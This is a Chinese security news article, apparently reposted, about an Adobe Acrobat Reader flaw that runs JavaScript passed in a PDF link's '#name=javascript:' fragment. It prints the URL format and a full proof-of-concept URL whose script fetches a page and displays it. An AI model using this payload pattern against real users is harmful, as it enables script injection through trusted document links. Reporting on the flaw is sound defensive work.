「编者按」一个平安无事的PDF文件却可以造成你的系统被入侵,这种问题并不是虚构的,他确确实实出现在Adobe Acrobat reader中,非法用户可以通过修改地址链接的方法,将自己的恶意脚本加载到PDF浏览地址中,
从而造成用户浏览PDF文件的同时加载非法脚本。众所周知我们在网上输入诸如WORD,EXCEL,PDF等文件的真实地址都会自动调用相应的程序打开这些文件,然而这种通过IE浏览器自动调用程序打开指定文件的方法一旦被非法用户获取,他们就可以利用程序的漏洞来通过网络传播恶意脚本,最近一个PDF文件恶意脚本执行问题爆发了。
Adobe Acrobat Javascript执行漏洞被公开国外的安全人士发现了一个未经修补的Adobe Acrobat Reader漏洞,它在用户打开本地PDF文档的时候使攻击者执行一段JavaScript代码,利用这些JavaScript代码可以实现非法用户入侵PDF文件浏览者的目的。
漏洞现象——通过使用固定格式的地址链接可以让用户浏览PDF文件的同时加载恶意JavaScript代码。
漏洞原理——当非法用户采用以下格式传播PDF文件浏览地址时会造成漏洞的产生,具体格式为http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:your_code_here.从格式中我们可以看出只需要在PDF浏览地址后面加上恶意脚本和名称即可。要知道这种恶意脚本传播方式并不需要入侵者获得PDF文件的可写权限,可以在不动PDF文件内容的情况下实现恶意脚本加载的目的。
非法入侵范例——任何在网上的PDF文件都可以被非法用户利用,下面是一个具体例子。
http://www.google.com/librariancenter/downloads/Tips_Tricks_85x11.pdf#something=javascript:function%20createXMLHttpRequest(){%20%20%20try{%20return%20new%20ActiveXObject('Msxml2.XMLHTTP');%20}catch(e){}%20%20%20try{%20return%20new%20ActiveXObject('Microsoft.XMLHTTP');%20}catch(e){}%20%20%20try{%20return%20new%20XMLHttpRequest();%20}catch(e){}%20%20%20return%20null;}var%20xhr%20=%20createXMLHttpRequest();xhr.onreadystatechange%20=%20function(){%20%20%20%20if%20(xhr.readyState%20==%204)%20%20%20%20%20%20%20%20alert(xhr.responseText);};xhr.open('GET',%20'http://www.google.com',%20true);xhr.send(null);
通过本例子非法黑客使得普通用户在浏览http://www.google.com/librariancenter/downloads/Tips_Tricks_85x11.pdf这个地址的PDF文件时将被自动加载下面的javascript恶意脚本。
文字:http://www.qqread.com/virus/i291751.html
更多内容请看脚本攻击和防范专题,或进入讨论组讨论。
相关专题
- 脚本攻击和防范 (2370篇文章)
- Trojan-Dropper.Win32.Agent.bgc分析清除 (1次浏览)
- 木马Backdoor.Win32.VanBot.dd分析与清除 (0次浏览)
- 耍你没商量,病毒也骗人 (0次浏览)
- 病毒预警: AUTO病毒成新年第一大毒枭 (0次浏览)
- wuauclt.exe病毒解决方案 (0次浏览)
- QQ盗号木马用文本图标迷惑用户 (0次浏览)
- 木马Backdoor.Win32.VanBot.az分析与清除 (0次浏览)
- “灰鸽子变种ZYV”远程监听控制受害电脑 (0次浏览)
- 恶意广告飘游戏公告 警惕系统已遭感染 (0次浏览)
- 警惕“黑客遥控器9728”遥控你的电脑 (0次浏览)
